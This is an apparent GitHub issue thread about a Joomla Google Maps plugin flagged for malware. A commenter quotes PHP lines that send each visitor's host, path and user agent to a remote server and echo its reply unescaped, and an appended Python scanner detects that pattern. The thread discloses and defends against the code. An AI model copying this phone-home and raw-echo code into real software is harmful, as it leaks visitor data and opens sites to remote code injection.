jmosmap / plugin_googlemaps

This is the Joomla plugin Google maps by Reumer
http://tech.reumer.net
GNU General Public License v3.0

Hacked? #39

Open jaccsnl opened 7 years ago

jaccsnl commented 7 years ago

I got the following message from a specialist that was removing a hack from a website of mine:

CLEARED: Cleared malware from file: ./plugins/system/plugin_googlemap3/plugin_googlemap3.php Details: php.spam-seo.link_injector.009

So I guess there is something wrong in that file.

thexmanxyz commented 7 years ago

@jaccsnl This does indeed look a bit mysterious. Next time please provide the actual line of code where the suspicious code starts; this saves some time. But big thanks for reporting this, even if the response is very late... However, I took the time and looked deeper into the code and also found the line(s) which are the potential reason for the alarm (I guess these must be the lines, because there is nothing else you could mean). I compared one of the old plugin files from Reumer with the latest version, and the actually critical lines are 110-116; they were added with v3.4 and updated with v3.5. Especially line 112 is curious, because it can potentially be used to load malicious code. Currently it does not, and I also didn't notice any critical behaviour over the last months, which doesn't mean it didn't happen. I also didn't discover any infections on my webserver. However, I'm not quite sure if I should trust this plugin after seeing the following lines:

// Lines 110-116 of plugin_googlemap3.php (v3.4/v3.5) as quoted in this thread.
// Outbound HTTP request with a 3 second timeout.
$ctx = stream_context_create(array('http' => array('timeout' => 3)));
try {
    // Builds a URL from the visitor's host, request path and User-Agent and
    // fetches it from the remote host; '@' suppresses the warning on failure.
    $credit = @file_get_contents('http://ww.mapsplugin.com/bro/3/' . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . 'QQQ' . $_SERVER['HTTP_USER_AGENT'] . 'QQQEND', false, $ctx);
} catch (Exception $e) {
    // file_get_contents() returns false instead of throwing, so this never runs.
}
// Whatever the remote host returned is written into the page without escaping.
echo $credit;

To summarize: the line (112) contacts the current "official" server of the plugin, receives an empty result and prints nothing. An access URL would look like this:

http://ww.mapsplugin.com/bro/3/myserver.com/myserver.path/QQQMyBrowserOrAgentQQQEND

The construction of the URL and the callback to the server (on every page access containing the maps module!) is something that we don't want or expect from this plugin, because the current user agent, the server URL and the path are transferred back to the plugin server. Why?! Moreover, the result from the callback is published uncontrolled to the web page containing the module. But, so far so good.

The ownership of this plugin is currently unclear, so I suggest thinking twice if you want to keep using this plugin. However, I will now create a version of this plugin which fixes the problems I noticed (including 2 bugfixes and the removal of this potentially risky code). This post is not meant to be offensive or to point at anybody. However, even if the variable is called credit, it's strange that it is printed directly before the actual map code is loaded and that its content is retrieved from a server whose actual owner has been unknown for at least 2.5 years, because Reumer seems to be gone, at least from GitHub and the official homepage. It looks to me like some sort of backdoor for code injection. I hope I'm wrong, but who knows...

I will soon open a new issue which contains the modified version of the plugin with a description of the changes. For the callback-free version of the plugin plus a few bugfixes see also #40.
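The thread leaves readers with the question of how to find this pattern in their own plugin directories. The following is a small heuristic scanner for exactly the combination thexmanxyz describes: a remote fetch whose URL embeds request metadata from $_SERVER, followed by an unescaped echo of whatever came back. It is an added example written for this page, not code from the plugin or from either commenter. The regexes, the function names, the file-walking helper and both PHP samples are assumptions made here; the suspicious sample is modelled on the lines quoted above and the benign one is hypothetical. Being regex-based, it misses obfuscated or multi-line constructions and should be read as a triage aid.

```python
"""Heuristic scanner for the 'fetch remote content, echo it unescaped' pattern
discussed in issue #39. Added example: not part of plugin_googlemaps or the
issue itself. Regex names, detection rules and the sample PHP are assumptions."""
import os
import re

# PHP functions that pull content from a remote host.
REMOTE_FETCH = re.compile(r"\b(file_get_contents|curl_exec|fopen|fsockopen)\s*\(", re.I)
# A quoted http(s) URL literal on the same line.
HTTP_URL = re.compile(r"""['"]https?://[^'"]+""", re.I)
# Request metadata being concatenated into the URL (what leaks to the remote host).
SERVER_LEAK = re.compile(
    r"\$_SERVER\s*\[\s*['\"](SERVER_NAME|HTTP_HOST|REQUEST_URI|HTTP_USER_AGENT|"
    r"REMOTE_ADDR|HTTP_REFERER|HTTP_COOKIE)['\"]\s*\]", re.I)
# "$var = @file_get_contents(" : remembers which variable holds remote bytes.
ASSIGN_FETCH = re.compile(r"\$(\w+)\s*=\s*@?\s*(file_get_contents|curl_exec)\s*\(", re.I)
# "echo $var;" with nothing (no escaping, no parsing) between fetch and output.
ECHO_VAR = re.compile(r"\b(echo|print)\s+\$(\w+)\s*;", re.I)


def scan_php(source):
    """Return a list of (line_no, kind, detail) findings for one PHP source text."""
    findings = []
    fetched = {}  # variable name -> line where it received remote content
    for no, line in enumerate(source.splitlines(), 1):
        if REMOTE_FETCH.search(line) and HTTP_URL.search(line):
            url = HTTP_URL.search(line).group(0).lstrip("'\"")
            findings.append((no, "remote_fetch", url))
            leaked = SERVER_LEAK.findall(line)
            if leaked:
                findings.append((no, "server_data_in_url", ",".join(leaked)))
            m = ASSIGN_FETCH.search(line)
            if m:
                fetched[m.group(1)] = no
        m = ECHO_VAR.search(line)
        if m and m.group(2) in fetched:
            findings.append((no, "unescaped_echo_of_remote_content",
                             "$%s fetched at line %d" % (m.group(2), fetched[m.group(2)])))
    return findings


def is_phone_home_pattern(findings):
    """True when request data goes out to a remote host AND its reply is echoed raw:
    the combination that turns the quoted lines into a remote content-injection point."""
    kinds = {kind for _, kind, _ in findings}
    return {"server_data_in_url", "unescaped_echo_of_remote_content"} <= kinds


def scan_tree(root):
    """Scan every .php file under root; returns {path: findings} for files with hits."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    findings = scan_php(fh.read())
                if findings:
                    hits[path] = findings
    return hits


# Constructed sample modelled on the lines quoted in this thread (not the real file).
SAMPLE_SUSPICIOUS = r"""<?php
$ctx = stream_context_create(array('http' => array('timeout' => 3)));
try {
    $credit = @file_get_contents('http://ww.mapsplugin.com/bro/3/' . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . 'QQQ' . $_SERVER['HTTP_USER_AGENT'] . 'QQQEND', false, $ctx);
} catch (Exception $e) {
}
echo $credit;
"""

# Constructed, hypothetical benign comparison: a remote call that neither leaks
# request metadata nor echoes the reply without parsing and escaping it.
SAMPLE_BENIGN = r"""<?php
$json = file_get_contents('https://example.com/api/geocode?q=' . urlencode($address));
$data = json_decode($json, true);
echo htmlspecialchars($data['formatted_address'], ENT_QUOTES, 'UTF-8');
"""

if __name__ == "__main__":
    for no, kind, detail in scan_php(SAMPLE_SUSPICIOUS):
        print("line %d: %s (%s)" % (no, kind, detail))
    print("phone-home pattern:", is_phone_home_pattern(scan_php(SAMPLE_SUSPICIOUS)))
```

Run scan_tree('plugins') from the Joomla root to list every .php file with hits. is_phone_home_pattern() flags only the combination (request data out, raw reply in) that makes the quoted lines dangerous, so a plugin that merely calls a documented remote API and escapes the result is reported as a remote_fetch but not flagged.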